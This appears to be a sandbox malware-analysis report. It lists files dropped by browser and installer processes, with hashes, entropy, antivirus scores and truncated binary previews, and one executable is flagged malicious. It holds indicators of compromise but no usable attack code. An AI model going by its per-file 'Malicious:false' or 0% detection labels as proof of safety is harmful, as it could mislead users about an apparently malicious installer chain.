                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):11406
                                                                                                                                                            Entropy (8bit):5.745845607168024
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                            MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                            SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                            SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                            SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:[{"description":"treehash per file","signed_content":{"payload":"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
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):854
                                                                                                                                                            Entropy (8bit):4.284628987131403
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                            MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                            SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                            SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                            SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2525
                                                                                                                                                            Entropy (8bit):5.417954053901
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                            MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                            SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                            SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                            SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):97
                                                                                                                                                            Entropy (8bit):4.862433271815736
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                            MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                            SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                            SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                            SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (4882)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):122218
                                                                                                                                                            Entropy (8bit):5.439997574414675
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                            MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                            SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                            SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
                                                                                                                                                            SHA-512:17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):291
                                                                                                                                                            Entropy (8bit):4.65176400421739
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
                                                                                                                                                            MD5:3AB0CD0F493B1B185B42AD38AE2DD572
                                                                                                                                                            SHA1:079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
                                                                                                                                                            SHA-256:73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
                                                                                                                                                            SHA-512:32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (4882)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):130866
                                                                                                                                                            Entropy (8bit):5.425065147784983
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
                                                                                                                                                            MD5:1A8A1F4E5BA291867D4FA8EF94243EFA
                                                                                                                                                            SHA1:B25076D2AE85BD5E4ABA935F758D5122CCB82C36
                                                                                                                                                            SHA-256:441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
                                                                                                                                                            SHA-512:F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T
                                                                                                                                                            Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2602496
                                                                                                                                                            Entropy (8bit):6.716476069650749
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:49152:n1OQlAlUlfd9t/8syxSyUah7H5fzO6mxvyktfrq3ePoLFFWMWcl8wAJYGOLOl7r6:0XidxpbW8cCxaqYv1
                                                                                                                                                            MD5:55CA99F0DC9854368750B8886DC455FC
                                                                                                                                                            SHA1:A4F73306D531A2C31E4ABDF7B223BE6F3AF48F8F
                                                                                                                                                            SHA-256:08FFCE111757CA346B72844F6A6D0BE6D883782E71701BF1B3716865C4CE7DF4
                                                                                                                                                            SHA-512:D3EB3280AEF50AF71734057BADB65EC72B033EAAB05193B7DD8A390D537E694085B27A2399CDAF69FC2A02912D53F1CFC693A1C73EF5B0A6561FA34C67FFBEA8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....jY.................."...'.....W..........@..............................1......e(...`... ..............................................p1.<.....1.8.....&.Tu............1............................. .&.(...................pq1. ............................text.....".......".................`..`.data........0".......".............@....rdata........#.......".............@..@.pdata..Tu....&..v....&.............@..@.xdata..$X...p'..Z...>'.............@..@.bss.... .....'..........................idata..<....p1.......'.............@....CRT....0.....1.......'.............@....tls..........1.......'.............@....rsrc...8.....1.......'.............@..@.reloc........1.......'.............@..Bgjwrx.........1.......'.............@...................................................................................................................................
                                                                                                                                                            Process:C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):2598912
Entropy (8bit):6.6049974235008655
Encrypted:false
SSDEEP:49152:VTFgiFpGXOENKSgjGkJsv6tWKFdu9C6TELyvL/6mShMZtmjNUVrciV5P+7QVg07/:V+iDaWjxJsv6tWKFdu9CZgfQ
MD5:FECC62A37D37D9759E6B02041728AA23
SHA1:0C5F646CAEF7A6E9073D58ED698F6CFBFB2883A3
SHA-256:94C1395153D7758900979351E633AB68D22AE9B306EF8E253B712A1AAB54C805
SHA-512:698F90F1248DACBD4BDC49045A4E80972783D9DCEC120D187ABD08F5EF03224B511F7870320938B7E8BE049C243FFB1C450C847429434EF2E2C09288CB9286A6
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):8581632
Entropy (8bit):6.736578346160889
Encrypted:false
SSDEEP:98304:YxRJATZlLne1/cF6ZWHxD1HFH+J+70msIWeiLtRgi3d4PJpTcSqxyr:YxiZBG2xpljTcJy
MD5:831BA3A8C9D9916BDF82E07A3E8338CC
SHA1:6C89FD258937427D14D5042736FDFCCD0049F042
SHA-256:D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D
SHA-512:BEDA57851E0E3781ECE1D0EE53A3F86C52BA99CB045943227B6C8FC1848A452269F2768BF4C661E27DDFBE436DF82CFD1DE54706D814F81797A13FEFEC4602C5
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1053696
Entropy (8bit):6.539052666912709
Encrypted:false
SSDEEP:12288:m+PpRNPe4+DZFvnwJ9o+Hllp59K03AskvvukLosiLHrv7F0YmIYunuGS:m+hRCZhwY+Hllp59OHvfo7HrCYmItnC
MD5:8A2E025FD3DDD56C8E4F63416E46E2EC
SHA1:5F58FEB11E84AA41D5548F5A30FC758221E9DD64
SHA-256:52AE07D1D6A467283055A3512D655B6A43A42767024E57279784701206D97003
SHA-512:8E3A449163E775DC000E9674BCA81FFABC7FECD9278DA5A40659620CFC9CC07F50CC29341E74176FE10717B2A12EA3D5148D1FFC906BC809B1CD5C8C59DE7BA1
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):356352
Entropy (8bit):6.447802510709224
Encrypted:false
SSDEEP:6144:6gdDO1NTI8ew+Rh9CY8gjvXQ0AObEL9gqIL:6gda1FI8V+f9FFzA1IL
MD5:E9A9411D6F4C71095C996A406C56129D
SHA1:80B6EEFC488A1BF983919B440A83D3C02F0319DD
SHA-256:C9B2A31BFE75D1B25EFCC44E1DF773AB62D6D5C85EC5D0BC2DFE64129F8EAB5E
SHA-512:93BB3DD16DE56E8BED5AC8DA125681391C4E22F4941C538819AD4849913041F2E9BB807EB5570EE13DA167CFECD7A08D16AD133C244EB6D25F596073626CE8A2
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):6487736
Entropy (8bit):7.518089126573906
Encrypted:false
SSDEEP:98304:u4bRxuHuFP2rHLpHPA477yNRgoPbfnRROWR721LYfs17u0kcFrXLEJfwY:u4NxuOFI1AEyrbf/52BYfs1LkcFrXL+X
MD5:11C8962675B6D535C018A63BE0821E4C
SHA1:A150FA871E10919A1D626FFE37B1A400142F452B
SHA-256:421E36788BFCB4433178C657D49AA711446B3A783F7697A4D7D402A503C1F273
SHA-512:3973C23FC652E82F2415FF81F2756B55E46C6807CC4A8C37E5E31009CEC45AB47C5D4228C03B5E3A972CACD6547CF0D3273965F263B1B2D608AF89F5BE6E459A
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 3%
Process:C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe
File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):664064
Entropy (8bit):6.953961612144461
Encrypted:false
SSDEEP:12288:c/gzbnbASodCXNn5FJX5KLN9VmoBBDFyn/:kRSoSn5FJX5K59VmoDK
MD5:A147F46E2E1F315AA219482D645BEED9
SHA1:073A6AE153A903B31463FA33512AA93DA1E3BB6F
SHA-256:2EB33D31364355ACBA660487F3747A9899DBDEB2221C58EB2BF916E53267DBC4
SHA-512:690DD6A959C6043EFE48ECB840C6353B2CE5F95372933A7201959C5A2075657EE2B02921685EAF23AE0EC228ABD86AA24F7CB11A9F089EB49D20F6AB6C46E3B8
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe
File Type:data
Category:dropped
Size (bytes):60283
Entropy (8bit):4.569551839311306
Encrypted:false
SSDEEP:1536:JLFhcTCRX7325Q72JnHi/KPHVzwrU60mYuBYdoQ:hIC173hknmqBrRmzB9Q
MD5:3620E2D48EB60EC875FB9262ABC87D2B
SHA1:55C7CE6E00901BE5090D7D1ACFF47D30436FA5EF
SHA-256:E8E6F472277E0F3EE5B6640B0EC436029AF329E37F0C84978399DEB38768BEB1
SHA-512:CBE8C6BE90FD75EE9D0A912E832ED784C4273B495EE1246B97601A6FA24FA4CE6FB07BE97508DA4FA249F05C96D5A86DA1805099C06EDD1CA81E726954025DD9
Malicious:false
Process:C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):421200
Entropy (8bit):6.59808962341698
Encrypted:false
SSDEEP:12288:iHEqYsrMWIqz473PTiPoH/aGhUgiW6QR7t5qv3Ooc8UHkC2eKq87:iH9YsIWIW4rPTiPofaDv3Ooc8UHkC2e8
MD5:03E9314004F504A14A61C3D364B62F66
SHA1:0AA3CAAC24FDF9D9D4C618E2BBF0A063036CD55D
SHA-256:A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F
SHA-512:2FCFF4439D2759D93C57D49B24F28AE89B7698E284E76AC65FE2B50BDEFC23A8CC3C83891D671DE4E4C0F036CEF810856DE79AC2B028AA89A895BF35ABFF8C8D
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Process:C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):770384
Entropy (8bit):6.908020029901359
Encrypted:false
SSDEEP:12288:fQmCy3NeRjkpQmj3oaMtQqjoygfXq3kon9IlbgaOxQdVJJ6j5EBKX8hR5:ImCy3VQs9MtLjTgfa3kon9FaOdEz5
MD5:67EC459E42D3081DD8FD34356F7CAFC1
SHA1:1738050616169D5B17B5ADAC3FF0370B8C642734
SHA-256:1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067
SHA-512:9ED1C106DF217E0B4E4FBD1F4275486CEBA1D8A225D6C7E47B854B0B5E6158135B81BE926F51DB0AD5C624F9BD1D09282332CF064680DC9F7D287073B9686D33
Malicious:false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ R.HA<.HA<.HA<.A9..KA<.HA=..A<.'7..@<.'7...A<.'7..|A<.'7...A<.'7..IA<.'7..IA<.'7..IA<.RichHA<.........PE..L.....K.........."!................. ....... .....x.................................S....@..........................I......D...(.......................P....... L..h...8...........................pE..@............................................text............................... ..`.data...|Z... ...N..................@....rsrc................X..............@..@.reloc.. L.......N...\..............@..B........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            Process:C:\Windows\Temp\{3FEA3EF8-06A0-4E17-8781-E3F8913E3365}\.ba\RescueCDBurner.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):4567853
                                                                                                                                                            Entropy (8bit):7.952114001019503
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:98304:s4YzUBK1aYCyi23JXZmRHxR+jR+7U2F5gDVK3DSU4xKxmpu+:sZoBMav2ZpmR2jzhKzS5gUpH
                                                                                                                                                            MD5:30152DF1AEA607F1159EFEEAC2B8CED1
                                                                                                                                                            SHA1:E290B0553638EE68EB68C1CCE1062C733906EC9B
                                                                                                                                                            SHA-256:5E65CDCBE10EBA406222579CD400FC9D33D67F27F4F317188CCC8F33FF4589CC
                                                                                                                                                            SHA-512:94E75D7C67968BBE2EF303FCB8755BEF703A2BD8A8144F754AE7A1C66E70B743FED7239B826F699F13C33208594E9AA5C118F6B73D6151597370B76F83C7C9DD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:.J.d.^YuYVDM...R..ofpYK....G...CsW.P...a.E.\j..HcC.Y.rM.....u.l..Hk\eU..kVk........lAUkkaV.s.p..KM..q.H.c].O..D......opV..[taJ.....H..o..BH...jwN.a...X....cS.Q...N...vZ.TE...FYkQ..\M..FF.....gY.w.\.hUUfvF....Fs..f.E\].n..df.O.om....]..pA]O..Sg.DA.\.C.LPN.dk...._y.hrFd.W[....K.R`.\J..xDAp^e.G...msqh.w.ga...Oo.....^..Ti^d...Q[].Be.\A.....eU`Wt...xyo.r.RRvP....T.q.H.v.....l..L..ouX...Hm..T...KnV....`.Ri.T`e.....Q.Q.MY.L..ZB....h.S...f.L......w..nZ.].yx.DE..H.Gsx[W.Ac..gTe.mXmG.^YgmcH.hB..D.^\pBV.YK.g....mtlM.....WZ..sfE...oHKw.e.U.V.......[c..al...B.l....X.qx..EZe.m.....D.moC...\..fFaa.k.gCEp...bQ.......O...ndb.g.M.I`.j.ZueZ..j...hCc.Dly..G....\...Q.T.P...]..._..]t.[..K.WWM.bPp.H.w.lv...Y.frH..Ghx..PQuef.T`Ojqi.`.HY.vs...O.l.o.R.R..p.t.....Bk....S.e.....[DR`.Lv.]oJg.D.nao.p...ibP.L.QN.k..RC.O.f..i`...W.\.....T.p...H.........ZGG.n[[.H.^.e.ZX..S.DQ.NU..ap...B..P.Z..M..R..[Mp...TYH.u.....w^xi...w...C.PJkx...Oy..t.c........t....I.T..FR.N....Obkq.H.\w......W.wn.]uFRoi^D..F.P.......H.H.vd.[Axtp
                                                                                                                                                            Process:C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (449), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1986
                                                                                                                                                            Entropy (8bit):3.7259224395984756
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:y+03qHhhOFnquPpne1oucb+JH0w//yccuTZxQDOQrciGxr91Dl:X0nNhn6Ug0wXyczx8gVxrx
                                                                                                                                                            MD5:3DA2E442D7803E1DADC2E8D8F383B817
                                                                                                                                                            SHA1:1AC2C5AF9ECD7576173DFC41D48D650EBE3F245B
                                                                                                                                                            SHA-256:5C0771EC10DD07A00F1302EB662B9B0389F62FFC0CFC68423451575D15749617
                                                                                                                                                            SHA-512:8947DD3861F20CD7AFE9F8E251106B5B66519217CF26B0D65C1AC6516CF15C8F447FA27F817118CF81F22008AB39C0BFF3637607A1D4289CF9AD8DD08659AE0B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.x./.2.0.1.0./.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a.".>..... . .<.W.i.x.B.u.n.d.l.e.P.r.o.p.e.r.t.i.e.s. .D.i.s.p.l.a.y.N.a.m.e.=.".H.e.b.e.p.h.r.e.n.i.a.". .L.o.g.P.a.t.h.V.a.r.i.a.b.l.e.=.".W.i.x.B.u.n.d.l.e.L.o.g.". .C.o.m.p.r.e.s.s.e.d.=.".n.o.". .I.d.=.".{.9.4.6.b.b.f.d.e.-.2.e.2.c.-.4.5.c.e.-.9.b.b.b.-.9.a.5.3.3.c.5.3.c.d.8.8.}.". .U.p.g.r.a.d.e.C.o.d.e.=.".{.8.A.C.9.6.A.5.B.-.2.5.D.4.-.4.2.0.7.-.A.A.1.4.-.9.6.4.D.F.4.7.4.3.F.D.6.}.". .P.e.r.M.a.c.h.i.n.e.=.".y.e.s.". ./.>..... . .<.W.i.x.P.a.c.k.a.g.e.P.r.o.p.e.r.t.i.e.s. .P.a.c.k.a.g.e.=.".F.l.o.t.s.a.m.". .V.i.t.a.l.=.".y.e.s.". .D.i.s.p.l.a.y.N.a.m.e.=.".A.p.p.V.T.e.m.p.l.a.t.e.". .D.o.w.n.l.o.a.d.S.i.z.e.=.".3.1.6.4.1.6.". .P.a.c.k.a.g.e.S.i.z.e.=.".3.1.6.4.1.6.". .I.n.s.t.a.l.l.e.d.S.i.z.e.=.".
                                                                                                                                                            Process:C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):180800
                                                                                                                                                            Entropy (8bit):5.521664858470418
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3072:eliOVvlKspsvyqocbjJscJcWPKMFWb4El8BdNfgJ4/zF9Q+QxgZhBax+opwMhkMf:F4Ua+4pl9D
                                                                                                                                                            MD5:CA03420E7D92D1E8C8726615879FE50D
                                                                                                                                                            SHA1:49A62B1AB815C7A49E1F082B1CF27D3C1E1619BF
                                                                                                                                                            SHA-256:501B72E6C0FAF72779E013029BEAB90B6E02DD4FFE89DC6726FB897EF96274BF
                                                                                                                                                            SHA-512:8A963607B28D29F518D656B2FE39C843894F6E378577F1A1206AC633A10585334FA04B67565F1DAF07F89A727D98C3657317405510E4F4AA88C61A1EBF19733D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......j....O...O...O..S../O...o..*O...o..,O...O..+O...O..N..LP..?O..om..=O...I../O...o../O..Rich.O..........PE..L....wCB...........!.........0......I..............[.................................M.................................../..d...........X.......................L... ................................................................................text...0........................... ..`.rdata..L_.......`..................@..@.data...l...........................@....rsrc...X...........................@..@.reloc........... ..................@..B.wCB`....wCBm....wCBw....wCB.....wCB.....wCB.....wCB.....wCB.....wCB.....wCB....^xCB............KERNEL32.dll.NTDLL.DLL.USER32.dll.GDI32.dll.WINSPOOL.DRV.comdlg32.dll.COMCTL32.dll.ADVAPI32.dll.SHELL32.dll.VERSION.dll.MSVCRT.dll..............................................................................................
                                                                                                                                                            Process:C:\Windows\Temp\{9F696E4D-34FE-469A-BD9B-059ED59934CF}\.cr\w3245.exe
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2598912
                                                                                                                                                            Entropy (8bit):6.6049974235008655
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:49152:VTFgiFpGXOENKSgjGkJsv6tWKFdu9C6TELyvL/6mShMZtmjNUVrciV5P+7QVg07/:V+iDaWjxJsv6tWKFdu9CZgfQ
                                                                                                                                                            MD5:FECC62A37D37D9759E6B02041728AA23
                                                                                                                                                            SHA1:0C5F646CAEF7A6E9073D58ED698F6CFBFB2883A3
                                                                                                                                                            SHA-256:94C1395153D7758900979351E633AB68D22AE9B306EF8E253B712A1AAB54C805
                                                                                                                                                            SHA-512:698F90F1248DACBD4BDC49045A4E80972783D9DCEC120D187ABD08F5EF03224B511F7870320938B7E8BE049C243FFB1C450C847429434EF2E2C09288CB9286A6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Antivirus:
                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
